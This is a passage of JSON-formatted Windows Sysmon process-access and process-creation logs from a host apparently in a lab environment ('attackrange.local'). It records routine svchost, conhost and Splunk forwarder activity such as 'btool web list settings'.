tdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1706,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.797\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.797","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1707,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.797\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01C6-5F25-0000-0010766A0300}\r\nTargetProcessId: 3852\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.797","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01C6-5F25-0000-0010766A0300}","TargetProcessId":"3852","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1708,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.811\r\nProcessGuid: {A837DB8D-01C6-5F25-0000-0010376B0300}\r\nProcessId: 3872\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool web list settings --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {A837DB8D-01C6-5F25-0000-0010766A0300}\r\nParentProcessId: 3852\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  web list settings --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.811","ProcessGuid":"{A837DB8D-01C6-5F25-0000-0010376B0300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool web list settings --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{A837DB8D-01C6-5F25-0000-0010766A0300}","ParentProcessId":"3852","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  web list settings --no-log","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1709,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.797\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010766A0300}\r\nSourceProcessId: 3852\r\nSourceThreadId: 3856\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {A837DB8D-01C6-5F25-0000-0010376B0300}\r\nTargetProcessId: 3872\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.797","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010766A0300}","SourceProcessId":"3852","SourceThreadId":"3856","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{A837DB8D-01C6-5F25-0000-0010376B0300}","TargetProcessId":"3872","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1710,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.797\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.797","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1711,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.797\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C6-5F25-0000-0010376B0300}\r\nTargetProcessId: 3872\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.797","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C6-5F25-0000-0010376B0300}","TargetProcessId":"3872","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1712,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.797\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.797","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1713,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.797\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.797","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1714,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.797\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.797","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 